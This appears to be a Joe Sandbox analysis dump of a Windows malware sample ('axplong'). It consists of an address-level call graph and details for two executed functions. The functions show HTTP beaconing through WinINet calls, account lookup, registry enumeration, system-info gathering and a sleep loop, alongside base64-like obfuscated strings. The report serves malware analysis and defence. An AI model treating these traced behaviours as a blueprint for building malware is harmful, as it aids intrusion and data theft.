std::_Xinvalid_argument 13840->13842 13841 79e435 13841->13837 13842->13841 13843 79e270 4 API calls 13842->13843 13843->13842 13993 7986b0 13994 7986b6 13993->13994 13995 7c6659 RtlAllocateHeap 13994->13995 13996 7986c3 13995->13996 13997 7986d6 13996->13997 13998 7c66e7 4 API calls 13996->13998 13999 7986d0 13998->13999 14174 79dfd0 recv 14175 79e032 recv 14174->14175 14176 79e067 recv 14175->14176 14178 79e0a1 14176->14178 14177 79e1c3 14178->14177 14179 7ac5dc GetSystemTimePreciseAsFileTime 14178->14179 14180 79e1fe 14179->14180 14181 7ac19a 10 API calls 14180->14181 14182 79e268 14181->14182 13638 7a1dd0 13641 7a1e6b shared_ptr __dosmaperr 13638->13641 13639 79e440 6 API calls 13640 7a2936 shared_ptr std::_Xinvalid_argument 13639->13640 13641->13640 13650 7a1e78 13641->13650 13655 7c8979 13641->13655 13644 7a2265 shared_ptr 13644->13640 13659 7c6659 13644->13659 13647 7a268b shared_ptr __dosmaperr 13647->13640 13648 7c8979 4 API calls 13647->13648 13649 7a2759 13648->13649 13649->13640 13649->13650 13651 7a27d1 13649->13651 13650->13639 13666 79e440 13651->13666 13653 7a2843 13653->13640 13681 795df0 13653->13681 13656 7c8994 13655->13656 13688 7c86d7 13656->13688 13658 7c899e 13658->13644 13712 7c65a2 13659->13712 13661 7a267a 13661->13650 13662 7c66e7 13661->13662 13664 7c66f3 13662->13664 13663 7c66fd __cftof __dosmaperr 13663->13647 13664->13663 13724 7c6670 13664->13724 13667 79e489 13666->13667 13747 79bd60 13667->13747 13669 79e9a9 shared_ptr 13669->13653 13670 79e711 13670->13669 13671 79e440 6 API calls 13670->13671 13673 79f696 13671->13673 13672 79f892 shared_ptr 13672->13653 13673->13672 13674 79e440 6 API calls 13673->13674 13676 79f973 13674->13676 13675 79fa45 shared_ptr 13675->13653 13676->13675 13677 7c6659 RtlAllocateHeap 13676->13677 13678 79fbf1 13677->13678 13679 79e440 6 API calls 13678->13679 13680 7a054c shared_ptr 13679->13680 13680->13653 13682 795e28 13681->13682 13683 795f0e shared_ptr 13682->13683 13684 796060 RegOpenKeyExA 13682->13684 13683->13640 13685 79645a shared_ptr 13684->13685 13687 7960b3 __cftof 13684->13687 13685->13640 13686 796153 RegEnumValueW 13686->13687 13687->13685 13687->13686 13689 7c86e9 13688->13689 13690 7c683a __fassign 4 API calls 13689->13690 13693 7c86fe __cftof __dosmaperr 13689->13693 13692 7c872e 13690->13692 13692->13693 13694 7c8925 13692->13694 13693->13658 13695 7c8962 13694->13695 13698 7c8932 13694->13698 13705 7cd2e9 13695->13705 13696 7c8941 __fassign 13696->13692 13698->13696 13700 7cd30d 13698->13700 13701 7c683a __fassign 4 API calls 13700->13701 13702 7cd32a 13701->13702 13704 7cd33a 13702->13704 13709 7cf07f 13702->13709 13704->13696 13706 7cd2f4 13705->13706 13707 7cb4bb __fassign 4 API calls 13706->13707 13708 7cd304 13707->13708 13708->13696 13710 7c683a __fassign 4 API calls 13709->13710 13711 7cf09f __cftof __fassign __freea 13710->13711 13711->13704 13713 7c65ae 13712->13713 13715 7c65b5 __cftof __dosmaperr 13713->13715 13716 7ca783 13713->13716 13715->13661 13717 7ca78f 13716->13717 13720 7ca827 13717->13720 13719 7ca7aa 13719->13715 13722 7ca84a 13720->13722 13721 7cd6ef RtlAllocateHeap 13723 7ca890 __freea 13721->13723 13722->13721 13722->13722 13722->13723 13723->13719 13725 7c6692 13724->13725 13727 7c667d __cftof __dosmaperr __freea 13724->13727 13725->13727 13728 7c9ef9 13725->13728 13727->13663 13729 7c9f11 13728->13729 13731 7c9f36 13728->13731 13729->13731 13732 7d02f8 13729->13732 13731->13727 13733 7d0304 13732->13733 13735 7d030c __cftof __dosmaperr 13733->13735 13736 7d03ea 13733->13736 13735->13731 13737 7d040c 13736->13737 13739 7d0410 __cftof __dosmaperr 13736->13739 13737->13739 13740 7cfb7f 13737->13740 13739->13735 13741 7cfbcc 13740->13741 13742 7c683a __fassign 4 API calls 13741->13742 13746 7cfbdb __cftof 13742->13746 13743 7cd2e9 4 API calls 13743->13746 13744 7cc4ea GetPEB RtlAllocateHeap GetPEB RtlAllocateHeap __fassign 13744->13746 13745 7cfe7b 13745->13739 13746->13743 13746->13744 13746->13745 13746->13746 13748 79bdb2 13747->13748 13750 79c14e shared_ptr 13747->13750 13749 79bdc6 InternetOpenW InternetConnectA 13748->13749 13748->13750 13751 79be3d 13749->13751 13750->13670 13752 79be53 HttpOpenRequestA 13751->13752 13753 79be71 shared_ptr 13752->13753 13754 79bf13 HttpSendRequestA 13753->13754 13756 79bf2b shared_ptr 13754->13756 13755 79bfb3 InternetReadFile 13757 79bfda 13755->13757 13756->13755 14098 7a9310 14099 7a9325 14098->14099 14103 7a9363 14098->14103 14100 7ad041 SleepConditionVariableCS 14099->14100 14101 7a932f 14100->14101 14102 7acff7 RtlWakeAllConditionVariable 14101->14102 14101->14103 14102->14103 13461 7cd6ef 13464 7cd6fc __fassign 13461->13464 13462 7cd727 RtlAllocateHeap 13463 7cd73a __dosmaperr 13462->13463 13462->13464 13464->13462 13464->13463 14163 7ab7e9 14164 7ab6e5 11 API calls 14163->14164 14165 7ab811 Concurrency::details::_Reschedule_chore 14164->14165 14166 7ab836 14165->14166 14170 7acade 14165->14170 14168 7ab648 11 API calls 14166->14168 14169 7ab84e 14168->14169 14171 7acafc 14170->14171 14172 7acaec TpCallbackUnloadDllOnCompletion 14170->14172 14171->14166 14172->14171 13465 7c6beb 13472 7c6bf7 13465->13472 13467 7c6c26 13468 7c6c35 13467->13468 13469 7c6c43 13467->13469 13470 7c6c99 9 API calls 13468->13470 13485 7c68bd 13469->13485 13473 7c6c3f 13470->13473 13477 7c8aaf 13472->13477 13474 7c6c5d 13476 7c6c71 __freea 13474->13476 13488 7c6c99 13474->13488 13478 7c8ab4 __fassign 13477->13478 13481 7c8abf 13478->13481 13500 7cd4f4 13478->13500 13497 7c651d 13481->13497 13482 7cd727 RtlAllocateHeap 13483 7cd73a __dosmaperr 13482->13483 13484 7c8af2 __fassign 13482->13484 13483->13467 13484->13482 13484->13483 13519 7c683a 13485->13519 13487 7c68cf 13487->13474 13489 7c6cc4 __cftof 13488->13489 13495 7c6ca7 __cftof __dosmaperr 13488->13495 13490 7c6d06 CreateFileW 13489->13490 13496 7c6cea __cftof __dosmaperr 13489->13496 13491 7c6d38 13490->13491 13492 7c6d2a 13490->13492 13569 7c6d77 13491->13569 13555 7c6e01 GetFileType 13492->13555 13495->13476 13496->13476 13507 7c63f7 13497->13507 13501 7cd500 __fassign 13500->13501 13502 7c651d __fassign 2 API calls 13501->13502 13503 7cd55c __cftof __dosmaperr __fassign 13501->13503 13506 7cd6ee __fassign 13502->13506 13503->13481 13504 7cd727 RtlAllocateHeap 13505 7cd73a __dosmaperr 13504->13505 13504->13506 13505->13481 13506->13504 13506->13505 13508 7c6405 __fassign 13507->13508 13509 7c6450 13508->13509 13512 7c645b 13508->13512 13509->13484 13517 7ca1c2 GetPEB 13512->13517 13514 7c6465 13515 7c646a GetPEB 13514->13515 13516 7c647a __fassign 13514->13516 13515->13516 13518 7ca1dc __fassign 13517->13518 13518->13514 13520 7c6851 13519->13520 13521 7c685a 13519->13521 13520->13487 13521->13520 13525 7cb4bb 13521->13525 13526 7cb4ce 13525->13526 13527 7c6890 13525->13527 13526->13527 13533 7cf46b 13526->13533 13529 7cb4e8 13527->13529 13530 7cb4fb 13529->13530 13531 7cb510 13529->13531 13530->13531 13538 7ce571 13530->13538 13531->13520 13535 7cf477 __fassign 13533->13535 13534 7cf4c6 13534->13527 13535->13534 13536 7c8aaf __fassign 4 API calls 13535->13536 13537 7cf4eb 13536->13537 13539 7ce57b 13538->13539 13542 7ce489 13539->13542 13541 7ce581 13541->13531 13546 7ce495 __freea __fassign 13542->13546 13543 7ce4b6 13543->13541 13544 7c8aaf __fassign 4 API calls 13545 7ce528 13544->13545 13547 7ce564 13545->13547 13551 7ca5ee 13545->13551 13546->13543 13546->13544 13547->13541 13552 7ca611 13551->13552 13553 7c8aaf __fassign 4 API calls 13552->13553 13554 7ca687 13553->13554 13556 7c6e3c 13555->13556 13568 7c6ed2 __dosmaperr 13555->13568 13557 7c6e56 __cftof 13556->13557 13591 7c7177 13556->13591 13559 7c6e75 GetFileInformationByHandle 13557->13559 13557->13568 13560 7c6e8b 13559->13560 13559->13568 13577 7c70c9 13560->13577 13564 7c6ea8 13565 7c6f71 SystemTimeToTzSpecificLocalTime 13564->13565 13566 7c6ebb 13565->13566 13567 7c6f71 SystemTimeToTzSpecificLocalTime 13566->13567 13567->13568 13568->13496 13614 7c7314 13569->13614 13571 7c6d85 13572 7c70c9 4 API calls 13571->13572 13573 7c6d8a __dosmaperr 13571->13573 13574 7c6da3 13572->13574 13573->13496 13575 7c7177 RtlAllocateHeap 13574->13575 13576 7c6dc2 13575->13576 13576->13496 13579 7c70df _wcsrchr 13577->13579 13578 7c6e97 13587 7c6f71 13578->13587 13579->13578 13595 7cb9e4 13579->13595 13581 7c7123 13581->13578 13582 7cb9e4 4 API calls 13581->13582 13583 7c7134 13582->13583 13583->13578 13584 7cb9e4 4 API calls 13583->13584 13585 7c7145 13584->13585 13585->13578 13586 7cb9e4 4 API calls 13585->13586 13586->13578 13588 7c6f89 13587->13588 13589 7c6fa9 SystemTimeToTzSpecificLocalTime 13588->13589 13590 7c6f8f 13588->13590 13589->13590 13590->13564 13592 7c7190 13591->13592 13594 7c71a4 __dosmaperr 13592->13594 13606 7cb568 13592->13606 13594->13557 13596 7cb9f2 13595->13596 13598 7cb9f8 __cftof __dosmaperr 13596->13598 13600 7cba2d 13596->13600 13598->13581 13599 7cba28 13599->13581 13601 7cba57 13600->13601 13604 7cba3d __cftof __dosmaperr 13600->13604 13602 7c683a __fassign 4 API calls 13601->13602 13601->13604 13605 7cba81 13602->13605 13603 7cb9a5 GetPEB RtlAllocateHeap GetPEB RtlAllocateHeap 13603->13605 13604->13599 13605->13603 13605->13604 13607 7cb592 __cftof 13606->13607 13609 7cb5ae __dosmaperr __freea 13607->13609 13610 7cd6ef 13607->13610 13609->13594 13613 7cd6fc __fassign 13610->13613 13611 7cd727 RtlAllocateHeap 13612 7cd73a __dosmaperr 13611->13612 13611->13613 13612->13609 13613->13611 13613->13612 13615 7c7338 13614->13615 13617 7c733e 13615->13617 13618 7c7036 13615->13618 13617->13571 13619 7c7042 __dosmaperr 13618->13619 13624 7cb87b 13619->13624 13621 7c7068 13621->13617 13622 7c705a __dosmaperr 13622->13621 13623 7cb87b RtlAllocateHeap 13622->13623 13623->13621 13627 7cb6de 13624->13627 13626 7cb894 13626->13622 13628 7cb6ee 13627->13628 13630 7cb6f5 13628->13630 13631 7d1ef8 13628->13631 13630->13626 13634 7d1d22 13631->13634 13633 7d1f0f 13633->13630 13635 7d1d54 13634->13635 13637 7d1d40 __cftof __dosmaperr 13634->13637 13636 7cb568 RtlAllocateHeap 13635->13636 13635->13637 13636->13637 13637->13633 13844 797400 13845 797435 shared_ptr 13844->13845 13848 79752f shared_ptr 13845->13848 13850 7ad041 13845->13850 13847 7975bd 13847->13848 13854 7acff7 13847->13854 13852 7ad052 13850->13852 13851 7ad05a 13851->13847 13852->13851 13858 7ad0c9 13852->13858 13855 7ad007 13854->13855 13856 7ad0af 13855->13856 13857 7ad0ab RtlWakeAllConditionVariable 13855->13857 13856->13848 13857->13848 13859 7ad0d7 SleepConditionVariableCS 13858->13859 13861 7ad0f0 13858->13861 13859->13861 13861->13852 13862 7a6ae0 13863 7a6b10 13862->13863 13866 7a46c0 13863->13866 13865 7a6b5c Sleep 13865->13863 13869 7a46fb 13866->13869 13881 7a4d80 shared_ptr 13866->13881 13867 7a4e69 shared_ptr 13867->13865 13870 79bd60 5 API calls 13869->13870 13869->13881 13882 7a4753 shared_ptr __dosmaperr 13870->13882 13871 7a4fee shared_ptr 13904 797d00 13871->13904 13872 7a4f25 shared_ptr 13872->13871 13876 7a6ab6 13872->13876 13874 7a4ffd 13910 7982b0 13874->13910 13877 7a46c0 19 API calls 13876->13877 13879 7a6b5c Sleep 13877->13879 13878 7a4a0d 13880 79bd60 5 API calls 13878->13880 13878->13881 13879->13876 13884 7a4a72 shared_ptr 13880->13884 13881->13867 13894 7965b0 13881->13894 13882->13878 13883 7c8979 4 API calls 13882->13883 13883->13878 13884->13881 13887 7a42a0 13884->13887 13886 7a5016 shared_ptr 13886->13865 13888 7a42e2 13887->13888 13889 7a4556 13888->13889 13892 7a4308 shared_ptr 13888->13892 13890 7a3550 16 API calls 13889->13890 13891 7a4520 shared_ptr 13890->13891 13891->13881 13892->13891 13914 7a3550 13892->13914 13903 4bb0d0a 13894->13903 13895 79660f LookupAccountNameA 13896 796662 13895->13896 13897 792280 4 API calls 13896->13897 13899 796699 shared_ptr 13897->13899 13898 796822 shared_ptr 13898->13872 13899->13898 13900 792280 4 API calls 13899->13900 13901 796727 shared_ptr 13900->13901 13901->13898 13902 792280 4 API calls 13901->13902 13902->13901 13903->13895 13905 797d66 shared_ptr __cftof 13904->13905 13906 797ea3 GetNativeSystemInfo 13905->13906 13907 797ea7 13905->13907 13909 797eb8 shared_ptr 13905->13909 13906->13907 13907->13909 13990 7c8a81 13907->13990 13909->13874 13912 798315 shared_ptr __cftof 13910->13912 13911 798454 GetNativeSystemInfo 13913 798333 13911->13913 13912->13911 13912->13913 13913->13886 13915 7a358f shared_ptr 13914->13915 13919 7a3ab2 shared_ptr std::_Xinvalid_argument 13914->13919 13915->13919 13922 7a38f5 shared_ptr __dosmaperr 13915->13922 13925 79aca0 13915->13925 13916 7c8979 4 API calls 13918 7a3a8a 13916->13918 13918->13919 13920 7a3b9d 13918->13920 13921 7a3e52 13918->13921 13919->13892 13930 7a1dd0 13920->13930 13947 7a2e20 13921->13947 13922->13916 13922->13919 13927 79adf0 __cftof 13925->13927 13926 79ae16 shared_ptr 13926->13922 13927->13926 13963 795500 13927->13963 13929 79af7e 13933 7a1e6b shared_ptr __dosmaperr 13930->13933 13931 79e440 6 API calls 13932 7a2936 shared_ptr std::_Xinvalid_argument 13931->13932 13932->13919 13933->13932 13934 7c8979 4 API calls 13933->13934 13942 7a1e78 13933->13942 13936 7a2265 shared_ptr 13934->13936 13935 7c6659 RtlAllocateHeap 13937 7a267a 13935->13937 13936->13932 13936->13935 13938 7c66e7 4 API calls 13937->13938 13937->13942 13939 7a268b shared_ptr __dosmaperr 13938->13939 13939->13932 13940 7c8979 4 API calls 13939->13940 13941 7a2759 13940->13941 13941->13932 13941->13942 13943 7a27d1 13941->13943 13942->13931 13944 79e440 6 API calls 13943->13944 13945 7a2843 13944->13945 13945->13932 13946 795df0 2 API calls 13945->13946 13946->13932 13949 7a2ec5 shared_ptr __cftof 13947->13949 13952 7a2e64 13947->13952 13948 79e440 6 API calls 13953 7a3423 shared_ptr 13948->13953 13950 7a32de InternetCloseHandle InternetCloseHandle 13949->13950 13951 7a32f2 InternetCloseHandle InternetCloseHandle 13949->13951 13949->13952 13949->13953 13950->13949 13951->13949 13952->13948 13955 79aca0 4 API calls 13953->13955 13958 7a38f5 shared_ptr __dosmaperr 13953->13958 13960 7a351a shared_ptr std::_Xinvalid_argument 13953->13960 13954 7c8979 4 API calls 13956 7a3a8a 13954->13956 13955->13958 13957 7a3e52 13956->13957 13956->13960 13961 7a3b9d 13956->13961 13959 7a2e20 12 API calls 13957->13959 13958->13954 13958->13960 13959->13960 13960->13919 13962 7a1dd0 12 API calls 13961->13962 13962->13960 13964 795520 13963->13964 13966 795620 13964->13966 13967 792280 13964->13967 13966->13929 13970 792240 13967->13970 13971 792256 13970->13971 13974 7c8667 13971->13974 13977 7c7456 13974->13977 13976 792264 13976->13964 13978 7c7496 13977->13978 13980 7c747e __cftof __dosmaperr 13977->13980 13979 7c683a __fassign 4 API calls 13978->13979 13978->13980 13981 7c74ae 13979->13981 13980->13976 13983 7c7a11 13981->13983 13985 7c7a22 13983->13985 13984 7c7a31 __cftof __dosmaperr 13984->13980 13985->13984 13986 7c7c0f GetPEB RtlAllocateHeap GetPEB RtlAllocateHeap 13985->13986 13987 7c7c35 GetPEB RtlAllocateHeap GetPEB RtlAllocateHeap 13985->13987 13988 7c7d83 GetPEB RtlAllocateHeap GetPEB RtlAllocateHeap 13985->13988 13989 7c7fb5 GetPEB RtlAllocateHeap GetPEB RtlAllocateHeap 13985->13989 13986->13985 13987->13985 13988->13985 13989->13985 13991 7c86d7 4 API calls 13990->13991 13992 7c8a9f 13991->13992 13992->13909 14008 7aa140 14009 7aa1c0 14008->14009 14015 7a7040 14009->14015 14011 7aa1fc shared_ptr 14012 7aa3ee shared_ptr 14011->14012 14019 793ea0 14011->14019 14014 7aa3d6 14017 7a7081 __cftof __Mtx_init_in_situ 14015->14017 14016 7a72b6 14016->14011 14017->14016 14025 792e80 14017->14025 14020 793f08 14019->14020 14021 793ede 14019->14021 14022 793f18 14020->14022 14068 792bc0 14020->14068 14021->14014 14022->14014 14026 792ec6 14025->14026 14029 792f2f 14025->14029 14027 7ac5dc GetSystemTimePreciseAsFileTime 14026->14027 14028 792ed2 14027->14028 14030 792fde 14028->14030 14033 792edd __Mtx_unlock 14028->14033 14035 7ac5dc GetSystemTimePreciseAsFileTime 14029->14035 14044 792faf 14029->14044 14031 7ac19a 10 API calls 14030->14031 14032 792fe4 14031->14032 14034 7ac19a 10 API calls 14032->14034 14033->14029 14033->14032 14036 792f79 14034->14036 14035->14036 14037 7ac19a 10 API calls 14036->14037 14038 792f80 __Mtx_unlock 14036->14038 14037->14038 14039 7ac19a 10 API calls 14038->14039 14040 792f98 __Cnd_broadcast 14038->14040 14039->14040 14041 7ac19a 10 API calls 14040->14041 14040->14044 14042 792ffc 14041->14042 14043 7ac5dc GetSystemTimePreciseAsFileTime 14042->14043 14054 793040 shared_ptr __Mtx_unlock 14043->14054 14044->14016 14045 793185 14046 7ac19a 10 API calls 14045->14046 14047 79318b 14046->14047 14048 7ac19a 10 API calls 14047->14048 14049 793191 14048->14049 14050 7ac19a 10 API calls 14049->14050 14056 793153 __Mtx_unlock 14050->14056 14051 793167 14051->14016 14052 7ac19a 10 API calls 14053 79319d 14052->14053 14054->14045 14054->14047 14054->14051 14055 7ac5dc GetSystemTimePreciseAsFileTime 14054->14055 14057 79311f 14055->14057 14056->14051 14056->14052 14057->14045 14057->14049 14057->14056 14059 7abc7c 14057->14059 14062 7abaa2 14059->14062 14061 7abc8c 14061->14057 14063 7abacc 14062->14063 14064 7ace9b _xtime_get GetSystemTimePreciseAsFileTime 14063->14064 14067 7abad4 __Xtime_diff_to_millis2 14063->14067 14065 7abaff __Xtime_diff_to_millis2 14064->14065 14066 7ace9b _xtime_get GetSystemTimePreciseAsFileTime 14065->14066 14065->14067 14066->14067 14067->14061 14069 792bce 14068->14069 14075 7ab777 14069->14075 14071 792c02 14072 792c09 14071->14072 14081 792c40 14071->14081 14072->14014 14074 792c18 std::_Xinvalid_argument 14076 7ab784 14075->14076 14080 7ab7a3 Concurrency::details::_Reschedule_chore 14075->14080 14084 7acaa7 14076->14084 14078 7ab794 14078->14080 14086 7ab74e 14078->14086 14080->14071 14092 7ab72b 14081->14092 14083 792c72 shared_ptr 14083->14074 14085 7acac2 CreateThreadpoolWork 14084->14085 14085->14078 14087 7ab757 Concurrency::details::_Reschedule_chore 14086->14087 14090 7accfc 14087->14090 14089 7ab771 14089->14080 14091 7acd11 TpPostWork 14090->14091 14091->14089 14093 7ab747 14092->14093 14094 7ab737 14092->14094 14093->14083 14094->14093 14096 7ac9a8 14094->14096 14097 7ac9bd TpReleaseWork 14096->14097 14097->14093 14104 7a8700 14105 7a875a __cftof 14104->14105 14111 7a9ae0 14105->14111 14107 7a8784 14110 7a879c 14107->14110 14115 7943b0 14107->14115 14109 7a8809 std::_Throw_future_error 14112 7a9b15 14111->14112 14121 792ca0 14112->14121 14114 7a9b46 14114->14107 14116 7abe0f InitOnceExecuteOnce 14115->14116 14117 7943ca 14116->14117 14118 7943d1 14117->14118 14119 7c6beb 9 API calls 14117->14119 14118->14109 14120 7943e4 14119->14120 14122 792cdd 14121->14122 14123 7abe0f InitOnceExecuteOnce 14122->14123 14126 792d06 14123->14126 14124 792d11 14124->14114 14125 792d48 14137 792400 14125->14137 14126->14124 14126->14125 14130 7abe27 14126->14130 14131 7abe33 std::_Xinvalid_argument 14130->14131 14132 7abe9a 14131->14132 14133 7abea3 14131->14133 14140 7abdaf 14132->14140 14134 792aa0 10 API calls 14133->14134 14136 7abe9f 14134->14136 14136->14125 14158 7ab506 14137->14158 14139 792432 14141 7acb61 InitOnceExecuteOnce 14140->14141 14142 7abdc7 14141->14142 14143 7abdce 14142->14143 14146 7c6beb 14142->14146 14143->14136 14145 7abdd7 14145->14136 14153 7c6bf7 14146->14153 14147 7c8aaf __fassign 4 API calls 14148 7c6c26 14147->14148 14149 7c6c35 14148->14149 14150 7c6c43 14148->14150 14151 7c6c99 9 API calls 14149->14151 14152 7c68bd 4 API calls 14150->14152 14154 7c6c3f 14151->14154 14155 7c6c5d 14152->14155 14153->14147 14154->14145 14156 7c6c99 9 API calls 14155->14156 14157 7c6c71 __freea 14155->14157 14156->14157 14157->14145 14159 7ab521 std::_Xinvalid_argument 14158->14159 14160 7c8aaf __fassign 4 API calls 14159->14160 14162 7ab588 __fassign 14159->14162 14161 7ab5cf 14160->14161 14162->14139

                      Executed Functions

                      Function 0079BD60 Relevance: 19.6, APIs: 5, Strings: 6, Instructions: 310networkfileCOMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 763 79bd60-79bdac 764 79c1a1-79c1c6 call 7a7f30 763->764 765 79bdb2-79bdb6 763->765 771 79c1c8-79c1d4 764->771 772 79c1f4-79c20c 764->772 765->764 766 79bdbc-79bdc0 765->766 766->764 768 79bdc6-79be4f InternetOpenW InternetConnectA call 7a7870 call 795b20 766->768 796 79be51 768->796 797 79be53-79be6f HttpOpenRequestA 768->797 776 79c1ea-79c1f1 call 7ad593 771->776 777 79c1d6-79c1e4 771->777 773 79c158-79c170 772->773 774 79c212-79c21e 772->774 781 79c243-79c25f call 7acf21 773->781 782 79c176-79c182 773->782 779 79c14e-79c155 call 7ad593 774->779 780 79c224-79c232 774->780 776->772 777->776 784 79c26f-79c274 call 7c6b9a 777->784 779->773 780->784 787 79c234 780->787 788 79c239-79c240 call 7ad593 782->788 789 79c188-79c196 782->789 787->779 788->781 789->784 795 79c19c 789->795 795->788 796->797 801 79be71-79be80 797->801 802 79bea0-79bf0f call 7a7870 call 795b20 call 7a7870 call 795b20 797->802 804 79be82-79be90 801->804 805 79be96-79be9d call 7ad593 801->805 815 79bf11 802->815 816 79bf13-79bf29 HttpSendRequestA 802->816 804->805 805->802 815->816 817 79bf2b-79bf3a 816->817 818 79bf5a-79bf82 816->818 821 79bf3c-79bf4a 817->821 822 79bf50-79bf57 call 7ad593 817->822 819 79bfb3-79bfd4 InternetReadFile 818->819 820 79bf84-79bf93 818->820 825 79bfda 819->825 823 79bfa9-79bfb0 call 7ad593 820->823 824 79bf95-79bfa3 820->824 821->822 822->818 823->819 824->823 829 79bfe0-79c090 call 7c4180 825->829
                      APIs
                      • InternetOpenW.WININET(007E8D70,00000000,00000000,00000000,00000000), ref: 0079BDED
                      • InternetConnectA.WININET(00000000,?,00000050,00000000,00000000,00000003,00000000,00000001), ref: 0079BE11
                      • HttpOpenRequestA.WININET(?,00000000), ref: 0079BE5B
                      • HttpSendRequestA.WININET(?,00000000), ref: 0079BF1A
                      • InternetReadFile.WININET(?,?,000003FF,?), ref: 0079BFCD
                      • InternetCloseHandle.WININET(?), ref: 0079C0A7
                      • InternetCloseHandle.WININET(?), ref: 0079C0AF
                      • InternetCloseHandle.WININET(?), ref: 0079C0B7
                      Strings
                      Memory Dump Source
                      • Source File: 00000004.00000002.2603420342.0000000000791000.00000040.00000001.01000000.00000008.sdmp, Offset: 00790000, based on PE: true
                      • Associated: 00000004.00000002.2603398565.0000000000790000.00000004.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.2603420342.00000000007F2000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.2603504694.00000000007F9000.00000004.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.2603524043.00000000007FB000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.2603524043.000000000098C000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.2603524043.0000000000A6D000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.2603524043.0000000000A9F000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.2603524043.0000000000AA6000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.2603524043.0000000000AB6000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.2605045981.0000000000AB7000.00000080.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.2605192224.0000000000C5E000.00000040.00000001.01000000.00000008.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_4_2_790000_axplong.jbxd
                      Yara matches
                      Similarity
                      • API ID: Internet$CloseHandle$HttpOpenRequest$ConnectFileReadSend
                      • String ID: 8KG0fCKZFzY=$8KG0fymoFx==$RHYTYv==$RpKt$invalid stoi argument$stoi argument out of range
                      • API String ID: 688256393-332458646
                      • Opcode ID: 9cd8e159eeea685a06b09451b5348b43557c8af31fa5309c92e0fcb1a135221a
                      • Instruction ID: bc22c7012a281da3efbd14a4762f44aa87ec3320013abf533d8b872719742cdc
                      • Opcode Fuzzy Hash: 9cd8e159eeea685a06b09451b5348b43557c8af31fa5309c92e0fcb1a135221a
                      • Instruction Fuzzy Hash: 83B1E6B1A00118DBDF25CF28DC88BADBB75EF45304F504199F50997282E7789AC0CF95
                      Function 007965B0 Relevance: 7.3, APIs: 1, Strings: 3, Instructions: 257COMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 1144 7965b0-796609 1218 79660a call 4bb0d2b 1144->1218 1219 79660a call 4bb0d0a 1144->1219 1220 79660a call 4bb0d12 1144->1220 1145 79660f-796688 LookupAccountNameA call 7a7870 call 795b20 1151 79668a 1145->1151 1152 79668c-7966ab call 792280 1145->1152 1151->1152 1155 7966ad-7966bc 1152->1155 1156 7966dc-7966e2 1152->1156 1157 7966be-7966cc 1155->1157 1158 7966d2-7966d9 call 7ad593 1155->1158 1159 7966e5-7966ea 1156->1159 1157->1158 1160 796907 call 7c6b9a 1157->1160 1158->1156 1159->1159 1162 7966ec-796714 call 7a7870 call 795b20 1159->1162 1167 79690c call 7c6b9a 1160->1167 1172 796718-796739 call 792280 1162->1172 1173 796716 1162->1173 1171 796911-796916 call 7c6b9a 1167->1171 1178 79673b-79674a 1172->1178 1179 79676a-79677e 1172->1179 1173->1172 1180 79674c-79675a 1178->1180 1181 796760-796767 call 7ad593 1178->1181 1185 796828-79684c 1179->1185 1186 796784-79678a 1179->1186 1180->1167 1180->1181 1181->1179 1188 796850-796855 1185->1188 1187 796790-7967bd call 7a7870 call 795b20 1186->1187 1201 7967bf 1187->1201 1202 7967c1-7967e8 call 792280 1187->1202 1188->1188 1189 796857-7968bc call 7a7f30 * 2 1188->1189 1198 7968e9-796906 call 7acf21 1189->1198 1199 7968be-7968cd 1189->1199 1203 7968df-7968e6 call 7ad593 1199->1203 1204 7968cf-7968dd 1199->1204 1201->1202 1211 796819-79681c 1202->1211 1212 7967ea-7967f9 1202->1212 1203->1198 1204->1171 1204->1203 1211->1187 1215 796822 1211->1215 1213 7967fb-796809 1212->1213 1214 79680f-796816 call 7ad593 1212->1214 1213->1160 1213->1214 1214->1211 1215->1185 1218->1145 1219->1145 1220->1145
                      APIs
                      • LookupAccountNameA.ADVAPI32(00000000,?,?,?,?,?,?), ref: 00796650
                      Strings
                      Memory Dump Source
                      • Source File: 00000004.00000002.2603420342.0000000000791000.00000040.00000001.01000000.00000008.sdmp, Offset: 00790000, based on PE: true
                      • Associated: 00000004.00000002.2603398565.0000000000790000.00000004.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.2603420342.00000000007F2000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.2603504694.00000000007F9000.00000004.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.2603524043.00000000007FB000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.2603524043.000000000098C000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.2603524043.0000000000A6D000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.2603524043.0000000000A9F000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.2603524043.0000000000AA6000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.2603524043.0000000000AB6000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.2605045981.0000000000AB7000.00000080.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.2605192224.0000000000C5E000.00000040.00000001.01000000.00000008.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_4_2_790000_axplong.jbxd
                      Yara matches
                      Similarity
                      • API ID: AccountLookupName
                      • String ID: GVQsgL==$IVKsgL==$RBPleCSm
                      • API String ID: 1484870144-3856690409
                      • Opcode ID: 52b6dc3889e5cfbdd32bc4c8029dc9cbe87a5ea4a9ce38dbfca98333e2a29e71
